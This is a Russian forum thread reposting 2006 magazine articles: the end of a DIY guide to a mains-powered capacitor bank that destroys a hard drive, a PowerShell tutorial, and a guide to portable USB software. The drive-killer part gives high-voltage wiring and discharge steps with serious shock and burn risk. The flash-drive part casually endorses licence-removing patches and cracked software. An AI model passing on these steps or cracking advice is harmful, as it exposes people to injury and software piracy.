Затем разбираем рабочий БП, который и будет питать весь комп, и припаиваем сетевое питание нашего девайса. Рекомендую подпаиваться к тумблеру, откуда идет провод на плату штатного БП, чтобы можно было легко обесточивать вместе с компом и наш девайс. Удобно в корпусе штатного БП выломать несколько прутиков из решетки и провести таким образом в корпус БП провод. Завинчиваем корпус штатного БП и уже можем провести первые испытания. На АТХ-разъеме БП перемыкаем зеленый и черный провод, чтобы он мог включиться без «мамки». В принципе, можно подрубить его к «мамке» и включить через нее, но это не спортивно. Смотрим, чтобы провода от конденсаторов не перемыкались, и щелкаем тумблером, подавая питание в цепи адской машины. Здесь будь очень внимателен, смотри, чтобы никто не касался проводов, и ничего их не замыкало. Автора статьи именно на этом этапе хорошенько дернуло током. Если кулер закрутился, и ничего не сгорело, не взорвалось, не задымилось - уже неплохо. Затем отключаем питание, и очень аккуратно, на вытянутых руках, перемыкаем проводки, разряжая конденсаторы. Должна сверкнуть яркая вспышка и раздастся хлопок. Импульс тока настолько сильный, что если замкнуть эти два контакта тонким проводом, то он превратится в пар, красиво разбрызгивая металл.

Если вся операция прошла нормально, и все остались живы, а главное, ты увидел столь чудесный фейерверк, то можно переходить к заключительному этапу - подключению кнопки и монтажу всего в компьютерном корпусе. Устанавливаем штатный БП. Затем берем заранее подготовленную красную кнопку, смотрим, чтобы кнопка была рассчитана на большое напряжение, и ее контакт был нормально разомкнут (то есть, когда она не нажата, ток через нее не течет). Я ее подключал выносной в отдельном корпусе, изготовленном из порядком изнасилованного и так уже дохлого БП smile.gif. Подключив один контакт батареи конденсаторов напрямую к обмотке на харде, я хорошенько все заизолировал. Второй контакт подключаем к проводу, идущему на кнопку, затем второй провод подключаем к второму концу обмотки харда. Удобно пропустить все провода, идущие к харду, сразу через пятидюймовый отсек, поскольку снаружи удобнее монтировать.

Завершение

На этом этапе, собственно, у тебя есть работающйи компьютер — жесткий диск определяется, система загружается. Но у твоего компа есть секрет: жесткий диск обмотан шахидской намоткой из медного провода, и стоит тебе нажать на красную кнопку, как вся информация на винчестере мгновенно будет испорчена.

Вердикт восстановителей

Надо сказать, что мы очень лихо признали тот факт, что информация на жестких дисках действительно уничтожилась. Мы лишь зафиксировали тот факт, что винчестеры вышли из строя, испортились. С вопросом, можно ли восстановить с них какую-то информацию, мы обратились в R.Lab, и вот что они нам ответили.

!!!Еще 500 байт!!!

310 вольт

Внимание!!! Напряжение высокое: 310 вольт. Будь предельно осторожен. Разрядку конденсаторов осуществляй ТОЛЬКО при отключении от сети. При замыкании проводов, учти, что искра настолько сильная, что в месте замыкания проводов метал плавится и разбрызгивается — можно запросто остаться без глаз. Автора этой статьи несколько раз при написании било током, но, увы, он остался жив и дописал статью. smile.gif

Использование конденсаторов

Не забывай, что напряжение, на которое рассчитаны конденсаторы, должно быть не меньше 400 вольт. Если оно меньше, то их нужно ставить последовательно. Например, если ты вытащил их старого телека электролиты по 50 вольт на 1000 мкФ, то их нужно соединить с батареей из 8 штук, строго соблюдая полярность (как батарейки в плеере). Суммарная емкость этих 50-вольтовых будет 1000/8 =125 мкФ. Бери для последовательного соединения только одинаковые конденсаторы. Если будут разные кондеры, то их суммарная емкость определяется по формуле, которую можно найти в школьном учебнике физики


p.s. а лучше с окна его сразу или по веревке спустить на нижний балкон

Автор: Metallica Nov 19 2006, 16:06

Могучий шелл

Изучаем новую перспективную разработку от Microsoft

Жалкое зрелище представляет эта командная строка в Windows! Даже при большом желании сделать что-то толковое в ней сложно. Остается только возмущаться: «Мол, что за недоделка такая, пережитки досовских времен!» Не в пример cmd.exe, юниксовые оболочки позволяют комфортно чувствовать себя в консоли и автоматизировать рутинные действия любой сложности. Microsoft, конечно, понимает шаткость своего положения, поэтому с перепугу опубликовала бета-версию своего нового командного шелла. Штука получилась знатная: она обещает стать основным нововведением грядущей Windows Vista.

Экскурс в историю

Графический интерфейс в винде — стандарт де-факто. Консольные версии утилит, вообще говоря, большая редкость и не популярны среди пользователей. В никсах же все с точностью до наоборот — большинство приложений работают из командной строки, для которых нередко создаются надстраиваемые графические интерфейсы (frontend’ы) с помощью специальных средств разработки QT и GTK. Но опытный админ ловко оперирует консольными командами и может совершенно спокойно работать только в консоли. Преимущества подобного подхода на лицо.

Гейтс уже задумывался о том, что командный интерпретатор нужно менять. Еще в 1998-м году он дал добро на выпуск Windows Script Host. WSH существовал как надстройка над Win98, но не был полностью интегрирован с командной строкой, потому и провалился. И это несмотря на то, что исполняемые сценарии можно было писать на JScript, VBScript и других языках, например Perl, которые пользователь мог прикрутить самостоятельно. В системе нашлось немало бажных мест, которые быстро приспособили в своих целях вирусы и, по сути, окончательно похоронили благое начинание Microsoft.

Как говорят, первый блин комом. Следующая попытка Microsoft обещает стать куда более удачной или, вернее сказать, уже таковой стала. В сентябре прошлого года компания анонсировала бета-версию новой командной оболочки с кодовым названием Monad. Разработка позволяла пользователю выполнять любые действия из командной строки, используя удобный и интуитивно понятный синтаксис из языка высокого уровня. Со временем за разработкой закрепилось названия PowerShell, а также репутация одного из лучших нововведений Vista.

Устройство PowerShell

Чтобы на пальцах не объяснять прелести нового шелла, мы сразу приступим к практике. Такие вещи лучше всего объяснять на примерах. А чтобы добиться максимального результата, я рекомендую экспериментировать с командами прямо во время чтения статьи. Так ты лучше поймешь, о чем идет речь, и в дальнейшем будешь лучше ориентироваться среди команд и конструкций PowerShell. Правда, перед началом экспериментов шелл придется установить. Дистрибутив можно закачать с сайта www.microsoft.com, предварительно пройдя простую регистрацию, или же в готовом виде взять с нашего диска. Еще потребуется заинсталлить .Net Framework второй версии, но, скорее всего, он у тебя уже установлен.

Сразу предупреждаю: синтаксис PowerShell довольно специфичен и заметно отличается от юниксовых (bash’a или zsh). Сначала он даже может показаться сложным, но это только первое впечатление. Первая отличительная особенность шелла — это специфическая обработка вводимой информации. Если bash обрабатывает любое выражение как команду, то в PowerShell используется совершенно другой подход. Он пытается вычислить выражение. То есть если в командной строке bash набрать «5+3», то оболочка выдаст сообщение о том, что команда не найдена. А новая разработка от Microsoft вычислит выражение и выдаст результат на экран. Например:

PS C:\Documents and Settings\si> "test"

test

PS C:\Documents and Settings\si> 5+3*2

11

Проще говоря, PowerShell работает с данными, которые вводятся в командную строку с переменными. Ими даже можно манипулировать с помощью разных методов. Смотри, к примеру, на результат метода split:

PS D:\Documents and Settings\snake> "shut up mazafaka".split(" ");

shut

up

mazafaka

Строка разбилась на части по пробелу. Попробуй метод substring(int Indexstart) - выведется часть строчки, начиная с indexstart.

Впрочем, любые команды и запуск исполняемых файлов осуществляется как есть — главное не писать их в кавычках. Очень просто объявляются и переменные. Для этого используется стандартный оператор присвоения — «=». Зададим, например, массив и хэш значений:

PS C:\Documents and Settings\si> $massiv=@(1,2,3,4,5)

PS C:\Documents and Settings\si> $hash=@{key0="value1"; key1="value2"; key2="value3"}

А теперь выведем второй элемент каждого из них (замечу, что нумерация индексов начинается с нуля):

PS C:\Documents and Settings\si> $massiv[1]

2

PS C:\Documents and Settings\si> $hash["key1"]

value1

Теперь поговорим о другом важном отличие PowerShell. В никсах каждая утилита имеет разное количество аргументов и парсит переданные ей данные по-своему, то же самое касается и вывода данных. В msh команды называются Command lets (сокращенно — cmdlet'ами) и наследуются от одного базового класса. Отсюда все вытекающие последствия: данные они парсят одинаково, обладают схожими методами и на выходе подают данные в специально структурированном виде. Все командлеты — это наименьший модуль функциональности системы, своеобразный аналог встроенных команд в других оболочках. Cmdlet обозначается парой «глагол-оболочка», поэтому всегда имеет очень простое и запоминающиеся имя. Например, список запущенных процессов и информации о них можно получить, набрав в консоли команду Get-Process:

PS C:\Documents and Settings\si> Get-Process

Handles NPM(K) PM(K) WS(K) VM(M) CPU(s) Id ProcessName

------- ------ ----- ----- ----- ------ -- -----------

105 5 1216 3580 32 0,06 2940 alg

16 1 1388 1152 13 0,02 1284 cmd

581 7 1852 5256 28 60,72 896 csrss

[..]

По умолчанию в поставке поверх шелла идет примерно 130 встроенных cmdlet’ов. Их список можно получить с помощью командлета get-commands, а справку по каждому из них — с помощью get-help <название_командлета>.

Для удобства использования многие команды можно вызвать так, как если бы ты работал в юниксе. Cat покажет содержимое файла, ls выведет список файлов и папок в текущей директории, а history освежит память пользователя, выдав последние набранные команды. Хотя в PowerShell для этого используется Get-Content, Get-ChildItem, Get-History. Все это осуществляется на базе специальных псевдонимов (алиасов). Узнать соответствия псевдонимов настоящим командам можно, набрав в консоли команду alias.

Псевдонимы и сценарии

Интерпретатор поддерживает С#-подобный скриптовый язык, который использует такие возможности шарпа, как циклы (for,while,foreach), условия(if,switch), определение своих собственных пользовательских функций и ограничение видимости переменных (global/script/local/private). Кроме того, можно использовать регулярные выражения, например, в case-блоках оператора switch:

switch -regex ($var)

{

".*[0-9]+" { "строка заканчивается числом!" }

default { "строка не заканчивается числом." }

}

Ясно, что все управляющие конструкции языка программирования высокого уровня и более сотни команд на все случаи жизни позволяют автоматизировать любое действие. Нужно только захотеть. Предлагаю рассмотреть пару примеров.

Допустим, у нас в папке вперемешку свалены куча разных файлов и статья для Х с расширением doc. Легким движением руки мы получаем информацию о всех документах Word’а:

Get-ChildItem | sort-object extension | select name, length, extension | where { $_.extension -eq ".doc" }

Name Length Extension

---- ---- ---------

about_msh_for_step.doc 16789 .doc

Чтобы добиться результата, я использовал несколько cmdlets. Данные между ними последовательно передаются с помощью так называемого пайпа (| — полный аналог из bash’а). Если читать команду дословно, то получается такая картина: вывести файлы, отсортированные по расширению, с информацией об имени файла, размере и расширении, которые удовлетворяют требованию «расширение равно .doc». Все просто и логично. Браво, MS!

Естественно, команды совершенно необязательно набирать вручную в командной строке. Можно заранее определить нужную последовательность команд и запихнуть их в скрипт.

Сценарии PowerShell представляют собой обычные текстовые файлы с расширением ps1 (в старых версиях — .msh). Попробуем написать простенький сценарий, в котором определим функцию для вывода общего количества файлов в заданном каталоге и их общего размера. На практике это реализуется очень просто.

function dir_size

{

param ($dir)

$list = get-childitem $dir

foreach ($ob in $list)

{

$i++;

$size = $size + $ob.Length;

}

write-host "Размер директории: " $size "Она содержит " $i "элементов"

set-alias dsz dir-size

}

С помощью команды param мы присваиваем переменной $dir значение, которое было переделано в качестве параметра функции (если бы их было несколько, то нужно было бы последовательно указывать несколько переменных через запятую), далее получаем список директории и заносим его в переменную $list. Для каждого элемента этого списка делается следующее: увеличивается счетчик общего количества данных (переменная $i), а к переменной $size прибавляется размер текущего объекта. Далее информация выводится на экран посредством команды Write-host, а также назначается короткий алиас для быстрого вызова команды. Запустить скрипт очень просто — ./”DirSize.ps1”. Другой вариант — записать функцию в профайл, речь о котором пойдет ниже.

Фас, профиль!

Все, что находится в файле-профайле, исполняется со стартом PowerShell автоматически. Этот файл может лежать в таких местах:

1) "\Documents and settings\All users\Documents\PsConfiguration\profile.ps1"

2) "\Documents and settings\All users\\Documents\PsConfiguration\<shellId>_profile.ps1"

3) "Мои документы\PsConfiguration\profile.ps1"

4) "Мои документы\PsConfiguration\<shellId>_profile.ps1"

Что пихать в профайл, я думаю, понятно: настройки приглашения, установку алиасов для команд, выполнение каких-нибудь будничных операций, не требующих твоего вмешательства. Приведу небольшой пример кода от гиков с http://mshforfun.blogspot.com/:

function prompt

{

$host.ui.rawui.WindowTitle = "Files: " + (get-childitem).count + " Process: " + (get-process).count

Write-Host ("PS " + $(get-location) +">") -nonewline -foregroundcolor Magenta

return " "

}

Если добавить эту функцию в свой профайл, то приглашение, которое выводит текущий путь, окрасится в красивый фиолетовый цвет, а в заголовке окна покажется количество элементов в текущем каталоге и число запущенных процессов. Вообще, если немного повозится с тюнингом профайла, то можно нехило поднатаскаться в создании скриптов и заметно упростить использование шелла. Например, никто не мешает тебе подсвечивать разные типы файлов соответствующими им цветами. Это не только радует глаз, но и заметно упрощает навигацию по файловой системе. А реализуется проще простого:

$list = get-childitem | sort-object

foreach ($objItem in $list) {

if ($objItem.Attributes -contains "Directory") { $fgc="cyan" }

elseif ($objItem.Extension -eq ".ps1") { $fgc="blue" }

elseif ($objItem.Extension -eq ".exe") { $fgc="green" }

elseif ($objItem.Extension -eq ".zip") { $fgc="red" }

elseif ($objItem.Extension -eq ".rar") { $fgc="red" }

else { $fgc="gray" }

write-host $objItem.Name, $objItem.Length, $objItem.LastWriteTime -foregroundcolor $fgc

}

Формальное описание: получаем содержимое директории как массив, парсим его с помощью конструкции if/elseif/else, задаем значение переменной $fgc. Впоследствии, когда строка будет выводиться на экран, с ее помощью будет назначен цвет текста.

Интерфейс управления системой

А теперь с помощью функции получим список, установленного в системе оборудования:

Function Show-InstalledSoftware {

$prod = Get-WmiObject win32_product

$prod| sort name |ft Name, Version, Vendor, Installdate -a

}

set-alias sis Show-InstalledSoftware

Ты еще раз убедился, что скрипт написан полностью с использованием cmdlets. Этот код с вызовом функции Get-WmiObject я привел не просто так. WMI — это Windows Management Instrumentation, то есть программный интерфейс управления системой. С помощью WMI возможно управлять операционкой и получать информацию о системе. Например, ты легко можешь получить настройки БИОСа:

gwmi win32_BIOS

SMBIOSBIOSVersion : ASUS A7N8X2.0 ACPI BIOS Rev 10

Manufacturer : Phoenix Technologies, LTD

Name : Phoenix - AwardBIOS v6.00PG

SerialNumber : xxxxxxxxxxx

Version : Nvidia - 42302e31

Маленькое пояснение: gwmi — это короткий псевдоним все той же Get-WmiObject. Штука поистине уникальная: с ее помощью можно узнать о всех девайсах, присоединенных к твоему компу (принтеры, сканеры), сетевых настройках, легко управлять софтом, установленном на машине (так же как в меню «Установка и удаление программ») и многое другое. Смотри, как вывести свободное место на своих дисках:

get-wmiobject Win32_LogicalDisk | select deviceid,freespace,size

deviceid freespace size

-------- --------- ----

A:

C: 6861377536 27135164416

D: 1317060608 18867748864

Для этого в качестве параметра для Get-WmiObject мы передали флаг Win32_LogicalDisk и таким образом получили полную статистику по дискам с нужными нам полями. Набери в консоли «Get-WmiObject –list» — и ты подивишься разнообразию объектов, о которых собрана информация. Но едва ли среди этого огромного списка найдешь то, что тебе действительно нужно. Но тут есть простой рецепт — набери в консоли:

get-WMIObject -list | where {$_ -match "что тебя интересует"}

Конструкция, указанная после пайпа (|), — это что-то вроде аналога grep в юниксе. То есть она фильтрует строки по содержимому, и после ввода этой команды ты получишь только те строки, в которых содержится интересующая тебя последовательность символов.

Необычные провайдеры

Перейдем к еще одной новаторской фиче — PowerShell. Ребята из Microsoft подумали и решили максимально упростить работу пользователя с различными структурами: файловой системой, реестром, множеством переменных. Для всех них определены несколько общих методов, позволяющих легко манипулировать данными. Вот пример. Допустим, мы выбрали в качестве структуры (в плоскости PowerShell — провайдера) файловую систему и совершенно обычным образом перемещаемся между папками и дисками с помощью команды cd. Зашли в диск C:\ и просмотрели содержимое с помощью ls. А теперь выберем в качестве структуры реестр. По большому счету, он очень схож с файловой системой: разделы или ветки — это папки, а ключи реестра – это файлы. Так почему бы не перемещаться по ним аналогичным образом? Провайдером по умолчанию, что логично, установлена файловая система (FileSystem). Чтобы сменить провайдера, необходимо использовать команду Set-Location. Список всех доступных вариантов выдаст команда Get-PSProvider:

Name Capabilities Drives

---- ------------ ------

Alias ShouldProcess {Alias}

Environment ShouldProcess {Env}

FileSystem Filter, ShouldProcess {C, D, E, F..

Function ShouldProcess {Function}

Registry ShouldProcess {HKLM, HKCU}

Variable ShouldProcess {Variable}

Certificate ShouldProcess {cert}

Скажем, если ты хочешь изучить содержимое реестра, то должен переключиться на него с помощью команды Set-Location HKLM:\. Теперь просмотри список ветки HKLV с помощью ls. Вывод команды отображен на скрине — глянь туда. Теперь ты можешь творить с реестром, что хочешь. Его ветки теперь для тебя, как папки, и ты можешь бродить по ним через «cd». А значения ключей легко выводятся cat’ом. Это, кстати, одна из самых мощных и полезных фич PowerShell'a.

Это только начало приключений

Признаться, PowerShell настолько многообразный и функциональный, что едва ли я охватил даже тысячную часть всех его возможностей. Но я постарался показать самый сок и основной подход в реализации сценариев. Теперь — дело за тобой. Всевозможные HOWTO и подробная документация доступна в интернете, но пока только на английском языке. Но штуковина стоит того, чтобы с ней разобраться — за ней будущее.

Эти фишки помогут тебе в настройке автоматики

PowerShell предоставляет удобные средства по работе с системными службами. Следующая команда, к примеру, выводит список работающих служб:

get-service | where-object { $_.Status -eq "Running" }

Внимательно изучи ключи командлета set-service. С его помощью легко меняются любые параметры служб, например тип запуска:

set-service <имя_службы> -StartupType Manual

Новый шелл от Microsoft имеет в своем арсенале десятки служебных переменных, использованием которых не стоит пренебрегать. Например, переменная $LASTEXITCODE всегда содержит код завершения последней запущенной программы. Заюзать ее проще простого. Например, команда ping, в случае недоступности удаленного хоста, возвращает в качестве кода завершения единицу, а в случае получения ICMP-ответа (то есть удачного подключения) — ноль. Таким образом, написание простейшего скрипта для мониторинга работоспособности удаленного хоста сводится к одной-единственной конструкции if-else.

Удаленное администрирование

Народные умельцы уже написали клиент-серверный скрипт, позволяющий работать в PowerShell на расстоянии. Разработка доступна на сайте http://mshforfun.blogspot.com/2006/03/powershell-remoting-beta-and-future.html и весит аж 300 Кб. Сейчас расскажу, как его поставить. Выкачивай архив, распаковывай и запускай в PowerShell. Переходи в папку с сервером (PowerShellRemoting\server) и запускай инсталляционный скрипт: ./'install.ps1'. Не забудь одну важную вещь. В новом шелле есть такая фича, как execution policies, которая контролирует режимы запуска скриптов. По умолчанию ни один сценарий у тебя не запустится (это для твоей же безопасности сделали, наученные горьким опытом, Script Host). Чтобы активировать возможность запуска скриптов, необходимо выполнить команду Set-ExecutionPolicy RemoteSigned, устанавливающую разрешающий режим. Подробности по теме описаны в справке: Get-Help about_signing | more. Теперь вернемся к установке. После подтверждения установки, в системе обозначится новая служба PowerShellRemoting — ее необходимо запустить, а также настроить на автоматический запуск. Это делается через «Панель управление -> Администрирование -> Службы». По умолчанию шелл принимает подключения от администратора с локалхоста, а для того, чтобы разрешить доступ другим клиентам, необходимо исправить файл user.xml. Ну а дальше? Дальше надо аналогично установить клиентскую часть и радоваться жизни, подключаясь к удаленному компу: ./'Start-Remotehost.

WWW

Рекомендую посетить www.script-coding.info, один из немногих ресурсов с информацией о PowerShell на русском языке.

Большое количество полезных скриптов лежит на www.reskit.net. Их тоже в виде функций можно вставить в свой профайл. Пригодятся.

Хороший гид по PowerShell ты найдешь на сайте:

http://arstechnica.com/guides/other/msh.ars/1.htm

INFO

Название Monad пошло из философии Готфрида-Лейбница — «монадологии», которая гласит о том, что весь мир состоит из множества фундаментальных единиц (монады), которые гармонично соединены между собой. В PowerShell этими частицы являются cmdlet’ы. Что ни говори, а с этим не поспоришь.

DVD

На диске ты найдешь последнюю версию PowerShell, а также примеры скриптов

INFO

Любую команду можно в любой момент дополнить нажатием клавиши Tab. Знакомая фишка, да?


Автор: Metallica Nov 19 2006, 16:55

Убойная флешка


Джентльменский набор софта на твоей флешке

Дома я использую браузер Firefox, толково настроенный и вооруженный всевозможными плагинами. На чужом же компьютере мне постоянно пытаются подсунуть что-то свое. Вот прихожу в издательство, а там везде установлен Internet Explorer. Причем установить свои программы нельзя — система тут же напоминает о недостаточности прав. Еще бы, ведь администратор категорически против самодеятельности. Вот сижу теперь и думаю: то ли осваиваться с предложенным набором убого софта, то ли составить свой.

Portable Apps

Решение, конечно же, есть. Ведь программы можно записать на флешку и носить собой. Но тут опять загвоздка. Не получится просто установить приложение на сменный носитель и запускать его с чужого компа. В большинстве случаев возникнут проблемы с реестром, не говоря уже о всевозможных библиотеках и драйверах, активно используемых приложениями. Определить зависимости несложно, но для установки того же драйвера тебе, как минимум, понадобятся права администратора. А в этом случае наша затея теряет смысл. К счастью, нашлись энтузиасты, которые озадачились проблемой и начали разрабатывать специальные версии популярных приложений, адаптированные для запуска с USB-накопителей. В сети даже появилась новая категория программ — portable applications. Вот с ними нам и предстоит сегодня познакомиться. Начнем, пожалуй, с браузера.

Браузер

Чаще всего я запускаю браузер — это факт. Я настолько привык к удобному интерфейсу Firefox, его впечатляющей расширяемости и стабильной работе (для любой уязвимости тут же выходит апдейт), что использовать что-то другое уже попросту не могу. Поэтому на флешке я всегда ношу специальную портируемую версию огненной лисы, запускаемую без установки. Portable Firefox, а именно так называется разработка, распространяется в виде архива, который легко распаковывается на флешку, после чего успешно используется так, как если бы это был обычно установленный браузер. Портируемый Firefox легко поддается русификации с помощью специального xpi-файла с локализацией, однако на сайте и форуме www.mozilla.ru всегда можно найти готовую русскую версию модифицированной лисы. Важно, что подобные маневры никак не влияют на функциональность программы: ты по-прежнему можешь подключать любые расширения. Хороший сборник плагинов, кстати, компонует и распространяет все тот же сайт mozilla.ru. Поклонникам Opera’ы аналогичным образом подойдет программа Opera@USB.

Почтовый клиент

Если говорить о почтовом клиенте, то для поклонников The Bat! подготовлен беспроигрышный вариант. Сама Ritlabs, то есть разработчик мыши, изготовила портируемую версию своего приложения. Чудо называется The Bat! Voyager и устанавливается на нужный топ (флешку) с помощью специального мастера. В результате получается полноценный The Bat со всеми функциями и наворотами, но на сменном носителе. Единственное огорчает, что программа платная и очень капризная по отношению к регистрационным данным. Хуже всего то, что разработчиками применяется двухступенчатая система регистрации: сначала с помощью регистрационного ключа, а потом по идентификатору сменного устройства. В инете несложно найти патчи, которые эти ограничения снимают, но все-таки придется повозиться. Если такого желания нет, то рекомендую другой вариант — Portable Thunderbird. Не прога, а настоящая находка: функциональный почтовик на флешке да еще с открытыми исходниками.

Всего помаленьку

Очень важно иметь с собой файловый менеджер, так как стандартный проводник может вывести из равновесия кого угодно. Что касается Total Commander’а и Far’а, то никаких проблем не возникнет. Достаточно скопировать папки с установленными приложениями на флеш-накопитель и совершенно спокойно их использовать. Отличной заменой встроенному FTP-клиенту станет бесплатное приложение FileZilla. Тулза, работающая без дополнительной установки, удовлетворит потребности даже самых требовательных пользователей. Популярные мессенджеры Miranda IM, qip и &RQ также отлично работают без дополнительных доработок. Для этого нужно лишь скопировать на флешку все рабочие файлы, а также файлы-профили. Нужен портативный HTML-редактор? В этом случае идеально подойдет Portable NVU. Не Dreamweaver, конечно, но для быстрого редактирования веб-документа в непривычных условиях вполне сойдет. Кстати, на флешке возможно разместить функциональный веб-сервер (XAMPP), чтобы тестировать и отлаживать динамические Perl- и PHP-сценарии.

В нашем деле нередко требуется получить удаленный доступ к компьютеру. В принципе, вполне можно использовать любимый PuTTY, распространяющийся в виде отдельного exe'шника,.Но есть одно «но». По умолчанию SSH-клиент хранит настройки и параметры подключений в реестре, поэтому на каждом новом компьютере его придется конфигурировать заново. Специальная версия PortaPuTTY быстро решит эту проблему, сохранив конфиг в XML-файле.

Теперь о мультимедия. Winamp не всегда успешно работает на флешке. Но все его функции отлично выполняет портируемый плеер XMPlay, в чем ты скоро убедишься. Тут тебе и поддержка всех популярных форматов (OGG, MP3, WMA и т.д.), и плей-листов PLS/M3U/ASX/WAX и даже скинов, которые визуально позволяют сделать копию винампа.

Безопасность

Эффективно спрятать конфиденциальные данные позволяют всевозможные системы шифрования. Мы уже писали о них в одном из наших номеров. Тогдашние победители обзора (TrueCrupt и BestCrypt), хотя и позволяют хранить зашифрованный контейнер на внешнем носителе, но требуют установки в ОС специального. Другими словами, примонтировать зашифрованный диск на другом компьютере без предварительной установки софта ты не сможешь. Вряд ли кого заинтересует идея носить компромат в кармане, поэтому пришлось искать альтернативный продукт. Решение нашлось очень скоро. Отказавшись от контейнера в виде логического диска, можно легко оперировать отдельными файлами или, что удобнее, каталогами при помощи таких утилит, как Remora USB Disk Guard. Рассказывать о программе, по большому счету, нечего. Она просто эффективно шифрует данные с использованием криптостойких алгоритмов.

Тот, кто для разных сервисов в интернете использует уникальные пароли, особенно рекомендую разместить на флешке программу для хранения паролей. Ты не ошибешься, если остановишь свой выбор на утилите KeePass Password Safe. Пароли останутся в сохранности благодаря непробиваемой системе шифрования, а чрезвычайно удобный интерфейс поможет быстро найти то, что нужно, и освежить память. Программа хороша во всех отношениях: разработчики даже позаботились о том, чтобы информация о паролях не была перехвачена кейлоггерами, а это многого стоит.

Райские условия

Мало записать программы на диск — нужно позаботиться об их комфортном запуске. И с этой задачей с доблестью справляется утилита PStart. По сути, это обычная панель, на которой размещены ярлыки для запуска всевозможного софта. Но у нее есть специальный режим, позволяющий работать с программами на сменном носителе. Фишка в том, что PStart не привязывается к конкретной букве диска во время создания ярлыков. И если в одном компьютере флешка монтируется как диск F:, а на другом — G:, то любые ярлыки по-прежнему будут ссылаться на программы как ни в чем не бывало.

Сразу после запуска в трее появляется PStart, позволяющая запустить любое приложение с флешки за считанные секунды. Более того, для каждой портированной проги можно настроить запуск по расписанию или автостарт (во время запуска самого PStart’а). У меня, например, автоматически запускает Miranda. А вот наладить автозапуск, как в случае CD/DVD дисками, не получится, и виной тому — ограничения самой Windows. Справедливости ради замечу, что некоторые модели флешек такую возможность все-таки предоставляют.

Чертовски маленький линукс

Набор отборного софта не флешке — это уже хорошо. Но ты никогда не задумывался, что на ней можно разместить целую операционную систему. Просто вставил носитель в USB-разъем и грузи с него настроенную под себя ось без каких-либо ограничений и квот, препятствующих установке любимых программ. Воплотить мечту в реальность поможет любой LiveCD дистрибутив пингвина, но я рекомендую воспользоваться Damn Small Linux (www.damnsmalllinux.org). Суди сам: в 50-метровый образ тукса входят полноценные мультимедиа утилиты (XMMS), FTP-клиент, браузер Firefox, почтовый мыльник Sylpheed, текстовые и графические редакторы, проги для просмотра документов, файловые менеджеры, мессенджер, VNC- и Rdesktop-клиенты для доступа к удаленному компу. Более того, ты легко сможешь подключить DSLinux к локалке или инету, благо и DHCP-клиент, и пакеты для работы с PPP, PPPoE (ASDL) входят в стандартную поставку. Выбор именно этого дистрибутива обусловлен еще и тем, что он изначально заточен для работы с USB-накопителями, а это избавит нас от кучи геморроя.

Установить систему не составит труда, но для этого нужно немного подготовиться. Позаботься, чтобы на флешке было достаточно свободного места, а лучше вообще отформатируй накопитель, предварительно сделав бэкап всех файлов. Причем не стандартной утилитой Windows, а всемирно признанной тулзой HP USB Disk Storage Format Tool. Далее c помощью WinRAR можешь смело распаковать содержимое iso-образа в корень накопителя. Но для того, чтобы загрузиться с флешки, этого будет недостаточно. Нужно еще сделать флешку загрузочной, что реализуется с помощью специальной утилиты Syslinux. Требуется распаковать архив с программой в одну из папок и запустить со следующими ключами:

syslinux.exe -f G:

Здесь G: — это название нужного диска с флешкой. И вот только теперь все готово: убойный USB-накопитель в твоих руках. Большинство современных BIOS поддерживают загрузку с флешки в одном из режимов USB-HDD или USB-Zip. Функционально они ничем не отличаются, поэтому для загрузки с флешки достаточно установить любой из них. И вот еще бонус: во время обычной загрузки в винду, открой свой накопитель и среди файлов запусти файл dsl-windows.bat. И смотри, что произойдет smile.gif.

Найди свой софт

Естественно, набор софта каждый составляет под себя исходя из своих нужд и соображений. Я рассказал лишь о тех программах, которые постоянно использую с флешки сам. А тебе еще самому предстоит найти программы для записи болванок, просмотра изображений и бог знает чего еще на специализированных сайтах. Я дам тебе список: en.wikipedia.org/wiki/List_of_portable_applications, www.portableapps.com, www.tinyapps.org/, standalone.atspace.org/, www.no-install.com. Действуй! smile.gif

ИНФО

Установив расширение Firefox Bookmarks Synchronizer, ты получишь возможность синхронизировать закладки браузера по возращении домой. Актуальная копия всегда будет храниться на специальном FTP-cервере.

Флешки в последнее время сильно подешевели: накопитель с объемом 1 Гб уже не стоит нескольких тысяч рублей. Шестьсот-восемьсот рублей — это нормальная цена. Дешевеют и портавные жесткие диски, предназначенные для подключения к ноутбуку. Обрати на них внимание, если требуется большой объем.

ИНФО

Многие другие небольшие LiveCD-дистрибутивы можно загружать с USB. В том числе SLAX (www.slax.org), Puppy Linux (www.puppylinux.org), INSERT (www.inside-security.de/insert_en.html).

WWW

Portable Firefox

www.portableapps.com/apps/internet/browsers/portable_firefox

Opera@USB

www.opera-usb.com

The Bat! Voyager

www.ritlabs.com/ru/products/voyager

Portable Thunderbird

www.portableapps.com/apps/internet/email/portable_thunderbird

Total Commander

www.ghisler.com

Far

www.rarlab.com/far_manager.htm

FileZilla filezilla.sourceforge.net

Miranda IM

www.miranda-im.org

qip

www.qip.ru

&RQ

www.rejetto.com/&RQ

Portable NVU 1.0

johnhaller.com/jh/mozilla/portable_nvu/

XAMPP

www.apachefriends.org/en/xampp.html

XMPlay

www.un4seen.com

PortaPuTTY

socialistsushi.com/portaputty

Remora USB Disk Guard

www.richskills.com

KeePass Password Safe

keepass.sourceforge.net

PStart

www.pegtop.de/start

HP USB Disk Storage Format Tool

selfdestruct.net/misc/usbboot

Syslinux

syslinux.zytor.com

Портируемая радость

Читая эту статью, тебе не приходила мысль создать на USB-флешке некую виртуальную среду со своими системными настройками и реестром? Чтобы туда без проблем можно было установить системный драйвер (например, для True Crypt) и задать любые другие настройки для нормальной работы приложений. Представь: установил программу на флешку и можешь запускать ее откуда угодно. Хороша идея, да?
Воплощением этой мечты в жизнь занимаются сразу несколько команд разработчиков. Недавно на рынке даже появилась целая платформа U3 и созданные на ее основе накопители (www.u3.com/smartdrives/default.aspx). Немногим дороже обычных флешек они предоставляют возможность запускать любые приложения и драйвера с накопителя посредством специальной оболочки, не оставляя при этом следов в основной системе. Реализация системы жестко зашита внутрь самой флешки.

Совершенно иное решение предоставляет компания thinstall (thinstall.com/products/overview.php). Их продукт — Virtualization Suite — позволяет программно поместить приложение любой сложности внутрь специального контейнера. Такой контейнер представляет собой обычный exe-файл, состоящий из специальной виртуальной среды, а также всех необходимых для работы приложения драйверов и DLL-библиотек. Модифицированное таким образом приложение легко запускается на других компьютерах, даже с абсолютно «чистой» системой. Но не спеши радоваться. К сожалению, все мои попытки скачать программу и найти ее взломанный вариант не увенчались успехам. Может быть, тебе повезет больше?




Автор: Tier Nov 19 2006, 16:56

копировать, новое сообщение, вставить
копировать, новое сообщение, вставить
копировать, новое сообщение, вставить
копировать, новое сообщение, вставить
копировать, новое сообщение, вставить
копировать, новое сообщение, вставить
